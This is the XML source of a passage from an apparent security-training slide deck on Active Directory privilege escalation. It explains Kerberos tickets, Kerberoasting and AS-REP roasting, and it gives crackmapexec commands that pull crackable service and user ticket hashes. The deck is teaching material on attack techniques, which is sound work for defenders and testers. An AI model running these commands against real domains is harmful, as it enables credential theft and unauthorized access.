              </a:rPr>
              <a:t>A username in cleartext.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>A session key and other details that have been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ENCRYPTED </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>with the hash of the user’s password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2" indent="-140970">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>A session key, username, and other details that have been encrypted with the hash of the KRBTGT user. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750"/>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>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9" name="Picture 8" descr="Kerberos (I): How does Kerberos work? - Theory - Tarlogic Security - Cyber  Security and Ethical hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B1B8A5BD-3852-44BA-8053-AC1D66C8305C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3994395" y="1254259"/>
            <a:ext cx="5037922" cy="1614132"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3631826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203875" y="215704"/>
            <a:ext cx="9068753" cy="319943"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>AD Privilege Escalation &gt; Kerberos &gt; Service Ticket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dirty="0" smtClean="0"/>
              <a:pPr/>
              <a:t>35</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1" name="Picture 8" descr="kerberos-auth-2.drawio(3).png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B3C43206-8312-07D2-279B-B5D5CF9457EC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1376737" y="625135"/>
            <a:ext cx="5921767" cy="4053763"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2770942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90501" y="168516"/>
            <a:ext cx="9055911" cy="336674"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>AD Privilege Escalation &gt; Kerberos &gt; Service Ticket</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dirty="0" smtClean="0"/>
              <a:pPr/>
              <a:t>36</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
        <p:nvSpPr>
          <p:cNvPr id="7" name="Text Placeholder 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F28C404A-B500-CF74-B9C8-B69A77C338D4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2485094" y="4776608"/>
            <a:ext cx="6351624" cy="207047"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="800" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Motero</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="800" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>, Carlos &amp; Higuera, Juan-Ramón &amp; Bermejo, Javier &amp; Montalvo, Juan Antonio &amp; Gomez, Nadia. (2021). On Attacking Kerberos Authentication Protocol in Windows Active Directory Services: A Practical Survey. IEEE Access. PP. 1-1. 10.1109/ACCESS.2021.3101446. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="11" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2AA5D28C-7C49-3682-6FC3-95C93F51AE20}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="115104" y="1420618"/>
            <a:ext cx="4180610" cy="2296492"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 8" descr="https://ieeexplore.ieee.org/mediastore_new/IEEE/content/media/6287639/9312710/9501961/berme5-3101446-small.gif">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5DE24491-D031-94B0-B2F7-FBFBBEC367A0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4381928" y="1572242"/>
            <a:ext cx="4688868" cy="2005435"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="TextBox 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A6BEEB4A-0ADF-572E-D173-D8A733109978}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7326758" y="1871824"/>
            <a:ext cx="84440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chemeClr val="bg1"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="00FFFF"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Service ticket</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="00FFFF"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3142155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82902" y="168516"/>
            <a:ext cx="9063510" cy="309457"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t>AD Privilege Escalation &gt; Kerberos &gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1"/>
              <a:t>Kerberoasting</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0"/>
              <a:t> – Attacking Service Tickets</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37</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183707" y="604691"/>
            <a:ext cx="4464908" cy="4127092"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>SPN = Service Principal Name  (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>MSSQLSvc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>/sql01.example.com:1433)</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Users request Service Tickets (ST) to access service specified in service accounts' Service Principal Name (SPN) through TGS</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ST is returned. ST is encrypted with service account's password hash</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> Attacker can extract ST from memory and conduct offline </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>bruteforce</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> attack </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>If ST is decrypted successfully, we have found service account's plaintext password</a:t>
            </a:r>
            <a:endParaRPr lang="en-US">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="228600" indent="-228600">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Use GetUserSpns.py or CME </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>crackmapexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> &lt;DC&gt; -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>kerberoast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> roast.txt</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1200" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>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0" name="Picture 9" descr="A close up of a device&#10;&#10;Description automatically generated">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{299F8429-7DFF-C840-950A-7B5DF34E63E4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4712975" y="1184659"/>
            <a:ext cx="4391069" cy="2968009"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1523779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AD Privilege Escalation &gt; Kerberos &gt; AS-REP Roasting – Attacking TGTs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38</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flipH="1" flipV="1">
            <a:off x="9180323" y="1034590"/>
            <a:ext cx="111899" cy="945682"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:endParaRPr lang="en-US" sz="1200"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6" name="Picture 9" descr="Authentication Required">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B9D2AA19-1199-44DA-842D-B27465A1F873}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4690086" y="851203"/>
            <a:ext cx="4021439" cy="1769611"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="TextBox 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{86B7800E-4B11-45F5-9639-DAD13BB583A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="35476" y="735981"/>
            <a:ext cx="4501325" cy="3465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400" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>What if we didn't need to send the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>KRB_AS_REQ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>packet to attain the TGT for a user?</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>If this were possible, we could request a TGT for any user in the domain that was vulnerable to this and use the TGT to crack their password.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:spcBef>
                <a:spcPts val="1100"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPct val="0"/>
              </a:spcAft>
              <a:buFont typeface="Arial,Sans-Serif"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Thankfully this is possible! If a user has the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" b="1" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>DON’T_REQ_PREAUTH </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>flag set for their account. We can attain a TGT without knowing their password.</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
            </a:br>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:latin typeface="IBM Plex Sans"/>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>GetUserSPN.py or CME</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
              <a:latin typeface="IBM Plex Sans"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>crackmapexec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ldap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>dc.domain.local</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -u </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidUser</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> -p </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>ValidPass</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> --</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0" err="1">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>asreproast</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1400" dirty="0">
                <a:highlight>
                  <a:srgbClr val="808080"/>
                </a:highlight>
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t> asreproast.txt</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:highlight>
                <a:srgbClr val="808080"/>
              </a:highlight>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="14" name="Picture 13" descr="Kerberos (I): How does Kerberos work? - Theory - Tarlogic Security - Cyber  Security and Ethical hacking">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C33CD457-FC44-4467-AE3C-433FDBF3AE04}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4688098" y="2872502"/>
            <a:ext cx="4028607" cy="1470421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="874552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AD Privilege Escalation &gt; Bloodhound </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39</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754522"/>
            <a:ext cx="8558505" cy="1261939"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="0" tIns="0" rIns="0" bIns="0" rtlCol="0" anchor="t">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="IBM Plex Sans"/>
              </a:rPr>
              <a:t>Initial access on AD -&gt; Enumerate Active Directory</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="285750" indent="-285750">
              <a:buFont typeface="Arial,Sans-Serif" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
